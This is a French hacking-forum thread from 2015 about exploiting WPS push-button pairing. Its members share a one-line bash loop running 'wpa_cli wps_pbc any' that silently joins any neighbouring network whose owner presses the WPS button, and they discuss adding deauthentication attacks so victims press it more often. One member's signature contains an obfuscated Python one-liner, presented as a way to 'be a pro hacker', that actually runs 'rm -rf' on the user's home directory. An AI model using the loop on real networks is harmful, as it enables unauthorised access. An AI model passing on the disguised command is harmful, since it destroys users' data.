Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 23-01-2015 20:38:39

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Le wps et wpa_supplicant

Bonsoir cool


Je cherche a automatiser la connexion wps via push buttom dès qu'un ap environnant active cette fonction.Le problème c'est qu'avec wpa_cli (gestion active de wpa_supplicant) quand on fait un scan, ça reste pas actif comme dans airodump, obliger de relancer la commande pour voir apparaitre WPS-PBC a coté de l'ap en question si ce dernier l'a activé entre temps.

Le but serait rendre actif le résultat du scan de wpa_cli (facile avec du bash) mais surtout d'envoyer une connexion sur l'ap dès que WPS-PBC apparait lors du scan.La aussi je pourrais utiliser une boucle comme avec hostapd sur un sujet mais c'est pas le but, le but serait d'arriver en premier sur l'ap dès l'instant ou le pbc est activé.En faisant ça on augmente les chance de se connecter directement au réseau sans se faire refuser si on arrive en second par la box en question.

Donc faudrait capturer le processus du scan de wpa_cli pour le renvoyer en commande brut si WPS-PBC s'affiche.Je me doute que c'est faisable mais je sais pas trop comment hmm

De plus on pourrait utiliser la chose meme en passif, imaginez que Mr.Bean invite quelqu'un chez lui possedant un ordinateur portable ou que Mr.Bean décide de changer d'ordi ou d'android, la fleme de rentrer la clé, on appui sur le wps... et la PAF wpa_cli prend le relais et nous ammène directement sur le réseau big_smile

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 24-01-2015 14:54:20

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Je n'ai pas eu le temps de te répondre hier mais je pensais exactement à ça....
Même si la box "respecte" la "norme" WPS (un apparailage autorisé par session PBC) cela ne nous empêche pas de nous conecter en premier...
En plus, une fois que tu as la WPA, tu as trois minutes avant que la box légitime permette de réassocier
trois minutes et en plus tu as la clef WPA légitme.
Moi je dis, il y  a de quoi aussi faire un rogue AP parfait...

koala a écrit :

Je cherche a automatiser la connexion wps via push buttom dès qu'un ap environnant active cette fonction.Le problème c'est qu'avec wpa_cli (gestion active de wpa_supplicant) quand on fait un scan, ça reste pas actif comme dans airodump, obliger de relancer la commande pour voir apparaitre WPS-PBC a coté de l'ap en question si ce dernier l'a activé entre temps.

Je ne savais même pas que wpa_cli te permettait de voir que le PBC était activé.....
Plus les années passent et plus je me dis qu'il faudsrait masteriser quelquyes chose come scapy pour pouvoir faire nos propres scans avec notre analyse des paquets en live...

après pour utiliser wpa_supplicant ou wpa_cli il faut automatiser (si je me souviens bien) "scan" -> "scan_results" ->   grep /sed/ etc... pour analyser le scan -> "scan" -> "san_results" etc...

come ça je pense qu'on serait à deux trois secondes par scan....
L'idéal se serait vraiment de faire le sacn en bloquant sur l'objetif et le canal, là se serait exesivemnt rapide et donc plus efficace.

Vu que l'idée c'est de profiter de ce minimum de  trois secondes nécesaires à un humain poour prendre deux objets dans sa main pour appuyer sur deux boutons.

je regarderai ça....
Cette idée que tu as est semblable à une idée qui me trotte dans la tête par rapport au WPS en mnode PIN.
Je voudrais réussir à monter en place du "beaconing" entre AP cible et client. 
C'est à dire bloquer sur un objectif et échanger des probes en continu pour analyser les réponses dans l'apparté WPS.
Je pense que se serait le plus rapide et le plus fin pour réaliser cette ataque basée sur la vitesse d'exécution.

J'ai en ma possesion un script en base d'un truc que m'avait fait 'antares, il faut que je remette la main dessus, qui pourrait peut être être utile...  je le met ici ce soir...

à plus

Hors Ligne

#3 24-01-2015 17:49:33

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Kcdtv a écrit :

Plus les années passent et plus je me dis qu'il faudsrait masteriser quelquyes chose come scapy pour pouvoir faire nos propres scans avec notre analyse des paquets en live...

Ambitieux mais surement faisable cool

Kcdtv a écrit :

L'idéal se serait vraiment de faire le sacn en bloquant sur l'objetif et le canal, là se serait exesivemnt rapide et donc plus efficace.

Pas forcément, on peut aussi jouer les bourrin avec "wps_pbc any" et on se retrouvera aussitot connecter si un AP aux alentour l'active big_smile


Il faut quand meme noter qu'il y a un bug avec network_manager et wpa_supplicant quand on se connecte mais c'est résolvable avec un "dhclient wlan0" et un peu d'attente pour la négoce de l'ip.Quand a network_manager il ignore tout simplement le fait qu'on est connecter au réseau alors qu'on peut naviguer ouvrir des pages web etc... mais bon tant qu'on a la connexion le reste et pas vraiment important j'ai envie de dire.

Hors Ligne

#4 24-01-2015 18:53:52

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Comme tu dis l'IP on s'en fout à partir du moment où on récupère la clef. 
Façon reaver quoi: on s'arrête à la clef dans un premier temps. Faire tourner un truc pour récupérer le pass proprement se serait déjà fantastique.

Ambitieux mais surement faisable cool

c'est sûr que c'est pas donné au tout venant, mais l'union fait la force...
il y a déjà le vieux script de vinebock avec toutes les libraires etc... En mode PIN bien sûr mais ça peut pas mal orienter sur par mal de truc. wps_crack. : wpscrack.zip
Après si tu poenses qu'en bash on peut déjà faire quelquechose, bein c'est partit alors. ..
je vais bashiser un peu demain sur le thème "détecter le plus vite possible l'ouverture de l'espace temps connexion PBC"
Si tu as déjà fais quelques essais ou n'importequoi n'hésite pas à balancer pour que j'y jette un coup d'oeil.
En jouant avec les PID (j'ai toujours eu la flemme de le faire mais là je crois que ce serait le bonne occasion de coder come ça) et kill , tout ça mis dans une boucle while ou until avec comme condition d'exécution la non présence ou la présence (ça dépend si on préfère untill ou while, je ne sais pas vraiment dans quel cas il vaut mieux whiler que untiler de façon théorque) du framne PBC open

Pas forcément, on peut aussi jouer les bourrin avec "wps_pbc any" et on se retrouvera aussitot connecter si un AP aux alentour l'active big_smile

excelent big_smile

une question toi qui connait mieux le sujet. Combien de tempos se passe t'il en moyene entre le temps de lancer la peition et le temps pour récupérer la clef (avant la phase dhcpd)?
Parcequ'on pourrait déjà penser avec deux interfaces wireless à la foi
Une qui tourne en bovcle en lançant toutes les 30 secondes des pétitons PBC et l'autre pour scanner et desauthentifer dans le canl de l'AP cible. lorsque la deuxième interface détecte le PBC l'interface qui tourne en pétition PBC réincie un cycle de pétition ...

il faut que je me calle dimanche pour penser un peu et me remttre à bashiser un peu que je suis bien rouilé je crois. tongue

Hors Ligne

#5 24-01-2015 19:26:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

kcdtv a écrit :

Après si tu poenses qu'en bash on peut déjà faire quelquechose, bein c'est partit alors. ..

Oui, ça serait dans le meme principe que la commande bash pour laisser le wps_pbc actif dans un autre sujet, sinon pour le while ça fait troll je trouve, faut voir comme tu dis les process etc...


kcdtv a écrit :

une question toi qui connait mieux le sujet. Combien de tempos se passe t'il en moyene entre le temps de lancer la peition et le temps pour récupérer la clef (avant la phase dhcpd)?

C'est très rapide, on peut cibler directement l'adresse du réseau avec "wps_pbc BSSID" mais j'ai remarquer aucune différence avec un wps any qui lui a l'avantage de répondre a n'importe qui tongue

Perso, je m'en vais pour une semaine et demi je pourrais pas tester grand chose vue que je prends juste mon netbook en dépannage hmm mais a mon retour j'y compte bien smile

Hors Ligne

#6 25-01-2015 03:25:03

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Après la discussion d'y hier je pouvais pas laisser ça comme ça, aller on va rire un peu big_smile

SFR a écrit :

Nous vous recommandons d'utiliser la méthode "Bouton WPS". En effet, personne ne peut se connecter à votre box tant que vous n'appuyez pas sur le bouton.

FAUX!!      WPS = Worst Personal Security  lol

En image on comprends mieux,  lancement de wpa_cli et envoi de la commande bash qui renouvellera l'ecoute active des AP pouvant activé leurs bouton wps:

wpa_cli
while : ; do sudo wpa_cli wps_pbc any ; sleep 120 ; done &

w78o.png

wps_any veut dire que la commande répondra a tout les AP en cas d'activation du wps.(Notez qu'on peut aussi préciser le bssid du réseau mais ça ne change rien et diminue les chances de shoper une connexion car  trop restrictif).
Notez que j'ai volontairement attendu un peu avant d'appuyer sur le bouton wps de ma box histoire de voir si wpa_cli marche bien.
Activation par un AP du PBC et connexion immédiate en moins de 30 secondes de wpa_cli a ce dernier

ll4n.png

Lancement de la négociation de l'ip avec:

dhclient wlan0

Vérification de la connexion avec le navigateur sur l'interface de la box et localement sur l'ordinateur

cxfc.png


Notez le petit bug dont je parlai avec network_manager qui ignore carément la connexion

22wx.png



Conclusion: qu'on vienne pas me dire que le PBC est sure, de plus une intrusion comme celle-ci peut aussi très bien etre configurer passivement, un peu comme on lance airodump pour écouter les réseaux autour, sauf que la si un AP active son PBC c'est le parc astérix big_smile


Enjoy cool

Dernière modification par koala (25-01-2015 03:32:59)

Hors Ligne

#7 25-01-2015 19:25:34

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

lol lol

WPS = Worst Personal Security  lol

wps_any veut dire que la commande répondra a tout les AP en cas d'activation du wps.(Notez qu'on peut aussi préciser le bssid du réseau mais ça ne change rien et diminue les chances de shoper une connexion car  trop restrictif).
Notez que j'ai volontairement attendu un peu avant d'appuyer sur le bouton wps de ma box histoire de voir si wpa_cli marche bien.
Activation par un AP du PBC et connexion immédiate en moins de 30 secondes de wpa_cli a ce dernier

Mortel, efficace, radical cool

C'est assez fou koala.

  Je ne sais pas si tout le monde se rend compte.

Tu viens de démontrer théoriquement et concrètement avec une ligne de code bash que le PBC est mort-né.

  Et c'est pas que je veuille remuer les vieux débats, mais rappelles toi comment aphid de chez Bouygues a éludé complètement ces point là dans notre "débat".
   

Aphid a écrit :
kcdtv a écrit :

un protocole qui admet pendant x minutes n'importe le quel des dispositifs qui émet des paquets WPS PBC dans son rayon...

Il n'accepte pas n'importe quel device qui émet des paquets, il faut une certaine séquence pour que d'autres devices puissent  s'appairer à ce wifi via le PBC=> Appairage en série, non en parallèle

Donc c'est rigolo 5 min de prendre les gens pour des truffes mais j'avoue que là j'en ai marre. wink

  Non seulement il admet n'importe quel dispositif, la seule chose qui compte c'est d'être le premier sur l'intervalle, mais en plus il permet même à un dispositif de ne pas à avoir à donner un bssid ou un essid pour se connecter. Il n'y a même pas à se prendre le choux à "vigiler" les airs pour essayer d'être le premier et il n'y a pas se prendre la tête pour rédiger et lancer des requêtes sur mesures en fonction du PA.
On balance en boucle de façon in-discriminée une requête générale valable pour tout ce qui nous entoure, sans mème plus à voir de se préocupèrer de questions de timing....

C'EST LA BOUCLE DE LA MORT   big_smile   (Ps : je croyais que tu voulais pas de while tongue big_smile )
Le serpent qui se mort la queue et il n'y a pàs moyen d'en sortir, c'est un vérité physique, il n'y a rien à faire, la machine gagne sur l'homme en vitesse. 
Je veux dire par là que ce tu démontres va plus loin que une simple "proof of concept" mais c'est un échec et math conceptuel sur le PBC tel qu'il existe aujourdh'ui.
 
   

BRAVO KOALA

Je te félicite, c'est génial smile

Bien évidement je met une Épingle à ce topic....

Je suis encore tout estomaqué ....

wpa_cli
while : ; do sudo wpa_cli wps_pbc any ; sleep 120 ; done &

c'est un peu comme E=mc2, la formule magique big_smile


  Bravo encore, chapeau, tu as vini vidi et vici à la wifi-aliance tout de même.
C'est pas tout le monde qui peut dire ça... j'en compte trois dans le monde avec toi - devine sur le WEP - vinebock avec le  WPS en mode PIN et toi avec le WPS-PBC...
  Et ta méthode de crack est de loin le plus efficace est la plus rapide des trois : 30 secondes pour obtenir le clef
     
  Je suis tout retourné là... big_smile

  BRavo, bravo et bravo et merci beaucoup de nous permettre d'êtres les témoins privilégiés de tes découvertes. Celle-ci est abyssale, au sens liturgique du terme, elle remet en cause le fondement même du WPS qui était déjà mal en point avec le brute force WPS....

  a bientôt koala et merci smile

Hors Ligne

#8 25-01-2015 23:38:49

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Bonsoir,


Je suis le premier surpris aussi, et pour etre franc j'ai hésiter a rendre ça public vue la simplicité de la chose, c'est accessible a n'importe quel débile tongue

Mais c'est tellement gros en meme temps...

Quand a notre cher ami Aphid, je ne disai rien pour pas envenimer le sujet déja bien houleux, mais sans avoir encore testé la chose je savais déja qu'il avait tord.Pour le "while" on va dire que j'ai garder cette "trollerie" finalement depuis le tuto avec hostapd cool

Pour le reste, ben écoute de rien, c'est avant tout une passion, et j'espère qu'il y aura encore d'autres découvertes smile

Hors Ligne

#9 26-01-2015 12:26:45

Furyo
Membre Irremplaçable
Inscription : 25-11-2010
Messages : 1 393
Site Web

Re : Le wps et wpa_supplicant

Trop fort, Mister Koala wink


Bravo cool


Je prendrai le temps de répondre aux gens qui auront pris le temps de se présenter..
Les membres suspectés d'intentions douteuses ne trouveront que mon silence en réponse.
Morpheus à Néo : On n'est pas le meilleur quand on le croit, mais quand on le sait..
387003.jpg

Hors Ligne

#10 26-01-2015 16:03:48

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Bonsoir,

Je suis le premier surpris aussi, et pour etre franc j'ai hésiter a rendre ça public vue la simplicité de la chose, c'est accessible a n'importe quel débile tongue
Mais c'est tellement gros en meme temps...

  Que tu le dises ou pas... La faille est là. 
  Et comme tu le dis c'est quelque chose que n'importe qui peut appréhender et comprendre: Un humain n'a pas quatre bras extensibles.
  Un humain ne peut pas prendre deux dispositifs à la foi pour appuyer sur deux boutons en même temps.
A partir de là il y a un laps de temps exploitable par un attaquant vu que ce qui compte c'est "d'arriver" le premier sur l'intervalle d'ouverture PBC du PA. 
   Ce que tu as fais c'est trouver une façon de l'exploiter grâce "à seule ligne de code bash" (façon de parler bien évidemment car il faut s'appeler koala pour penser au truc, mettre en place la chose et y arriver coûte que coûte avec tous les bidules qu'on a sous la main)
    Chapeau quoi. big_smile
    Ça aurait été dommage de ne pas en parler.... De toute façon quel "dommages" peut tu créer?
   A part inviter à réfléchir sur le WPS et  à réaffirmer ce que nous avons dit pendant des années : que le WPS était un talon d'Achille inutile.
   
     
 

koala a écrit :

Quand a notre cher ami Aphid, je ne disai rien pour pas envenimer le sujet déja bien houleux, mais sans avoir encore testé la chose je savais déja qu'il avait tord.

  Je n'aurais pas du évoquer ce point là, ça sert à rien et aphid n'est plus repassé et n'est pas là pour répondre. En plus c'était bien de sa part de venir dans l'arène aux lions big_smile
  Il faut dire aussi que sur le coup les premier à s'être méchamment bouffé c'est la wifi aliance, les rédacteurs de la "norme WiFi"
  Au passage je suis tombé sur ça, qui a été rendu public en 2013 et qui semble être le un brevet du WPS  : Wireless communication method using WPS US 8447978 B2


koala a écrit :

Pour le "while" on va dire que j'ai garder cette "trollerie" finalement depuis le tuto avec hostapd cool

big_smile

"Son code il le signe à la pointe de l'épée
D'un while qui veut dire koala"
(à chanter sur l'air de "Zoro")

Hors Ligne

#11 26-01-2015 21:42:36

M1ck3y
Administrateur
Lieu : Lost in the darkness
Inscription : 14-02-2008
Messages : 6 354

Re : Le wps et wpa_supplicant

Ce sont souvent les choses les plus simples qui donnent les résultats les plus bluffants... Comme une ligne de bash!

C'est juste imparable, c'est le jeu de la lose... Tu appuies sur le bouton, tu perds à tous les coups lol

C'est quand meme ton second sujet épinglé section recherche de nouvelles failles... Là je dis respect man biere

Hors Ligne

#12 27-01-2015 15:24:04

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Si tu veux Kcdtv (et aussi car j'ai pas trop le temps), je te laisse ouvrir un topic et présenter cette méthode sur lampi wink j'espère que les gens prendront conscience du danger, et que surtout le wps si il n'est pas supprimé, changera...

C'est quand meme ton second sujet épinglé section recherche de nouvelles failles... Là je dis respect man

On dit jamais 2 sans 3 tongue

Hors Ligne

#13 27-01-2015 18:15:41

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Je t'envoie un MP pour qu'on en parle. wink

Hors Ligne

#14 02-02-2015 23:49:23

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Le wps et wpa_supplicant

Je suis honoré, on se souvient de moi. big_smile


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#15 03-02-2015 00:02:13

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

@Aphid


Malgrès certains désaccords passé tu es toujours le bienvenu ici smile

Hors Ligne

#16 03-02-2015 00:12:00

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Le wps et wpa_supplicant

Je n'en doutais pas vu l'accueil que j'avais reçu. smile

Pour revenir au sujet joli screen, en attente de la démo en tout cas.

Nous aussi on a bossé:

65240046wc.jpg

http://www.crack-wifi.com/forum/topic-1 … -8652.html


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#17 03-02-2015 00:52:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Attention ça rigole plus la lol

Doit-on applaudir ?
Donne nous des détails techniques croustillants je t'en prie, je veux tout savoir, and... koala is watching you tongue

Dernière modification par koala (03-02-2015 00:54:16)

Hors Ligne

#18 03-02-2015 01:05:44

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Le wps et wpa_supplicant

Ouai la classe hein. cool
Ai-je indiqué que cela réclamait une salve d'applaudissement? ^^

Toujours aussi bon l'accueil.

Allez j'essaierai de me reconnecter avant les 9 prochains mois. sad


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#19 03-02-2015 02:07:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Ce n'était pas méchant doh si on peut plus rire un peu roll

Comme j'ai dis tu es le bienvenu excuse mon humour un peu "piquant" je ferai gaffe a l'avenir cool

Hors Ligne

#20 03-02-2015 21:20:11

spawn
Modérateur
Inscription : 14-01-2011
Messages : 1 006

Re : Le wps et wpa_supplicant

lol

Que pensez-vous de minimiser la chose ? (il me semble que wpa_supplicant change des propriétés des interfaces réseau)
Qu'obtient-on avec le WPS-PBC ?
  - Comme avec WPS-PIN on peut remonter à la PSK ?
  - On obtient que la MSK ?
  - On obtient juste des clefs de session temporaires ?

(si on a moyen de remonter à la PSK, ça vaut le coup de faire un truc minimal qui a juste besoin de pouvoir envoyer des paquets raw sur une interface, plutôt que de set toutes les choses que fait wpa_supplicant)

Merci, bisous.


@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

Hors Ligne

#21 04-02-2015 01:09:21

Aphid
Membre
Inscription : 23-02-2014
Messages : 15

Re : Le wps et wpa_supplicant

@koala
T'inquiète, j'ai montré que je savais être résistant à la critique. wink
Je suis pas mal débordé d'où ma réponse.


La norme > l'interprétation de la norme > l'implémentation de l'interprétation

Hors Ligne

#22 04-02-2015 02:27:31

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

@Aphid

Je propose que tu nous explique un peu les nouveautés de bouygues pour contrer les attaques, hormis le fait que la box semble enfin plus résistante aux attaques par reaver (ça reste a vérifier avec plusieurs commandes) et qu'on peut désactiver le wps a tout moment.Qu'en est-il du PBC? d'autre part la box et elle aussi plus résistance contre le "deauthing" ?

Bref expliques nous et au pire envoi une box pour 1 mois qu'on la test big_smile

Hors Ligne

#23 04-02-2015 14:03:11

goodsayan
Membre
Inscription : 02-06-2014
Messages : 15

Re : Le wps et wpa_supplicant

Bonjour
Il fallait y penser mais c'est trop fort!

Je voudrais tester. Je dois bien lancer dans une console " wpa_cli " et das une autre "while : ; do sudo wpa_cli wps_pbc any ; sleep 120 ; done &"

Par rapport au screen, dans la console ou il y a lancé "while : ; do sudo wpa_cli wps_pbc any ; sleep 120 ; done &"
j'ai bien les memes messages:
Selected interface 'wlan0'
OK

Par contre celle avec wpa_cli, j'ai seulement cette ligne
<3>CTRL-EVENT-SCAN-RESULTS

et pas celle-ci
WPS-AP-AVAILABLE

Merci pour votre aide

Hors Ligne

#24 04-02-2015 14:50:53

kcdtv
Membre d'honneur
Lieu : Internacionaluña
Inscription : 31-03-2010
Messages : 4 246

Re : Le wps et wpa_supplicant

Par contre celle avec wpa_cli, j'ai seulement cette ligne

<3>CTRL-EVENT-SCAN-RESULTS

Là ça veut dire que tu as lancé un scan ("wpa_cli scan") en lançant wpa_cli.... Pour voir les résultats du scan il te faudrait lancer "scan_results" (wpa_cli est une commande "live" interactive, une fois que tu l'a lancé tu peux rentrer des ordres. 

spawn a écrit :

(si on a moyen de remonter à la PSK, ça vaut le coup de faire un truc minimal qui a juste besoin de pouvoir envoyer des paquets raw sur une interface, plutôt que de set toutes les choses que fait wpa_supplicant)

On pensait à la mème chose mais ça dépasse nos compétences et nos connaissances.



PS: BisOuX aussi big_smile

edit

1423061182.png

1423061349.png


Nice.... cool

Intrusion dans un réseau WiFi grâce au WPS

Hors Ligne

#25 04-02-2015 16:05:24

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : Le wps et wpa_supplicant

Coucou,

Effectivement on retombe dans l'idee de pouvoir forger nos propres paquets.Spawn tu pense que c'est possible de faire un truc comme ca en python?

Ca serait interessant aussi de faire le meme chose cote AP en utilisant hostapd.

Pour l'article de Korben je suis assez content qu'il ai accepter de faire tourner la chose, et comme vous pouvez voir j'ai negoce une petite pub pour le forum tongue

En regardant les commentaires on voit bien le manque d'infos assez cruel concernant le wps... de plus si on ajoute des attaques de deauth il y a encore plus de chance que l'user appui sur son bouton...

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.033 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]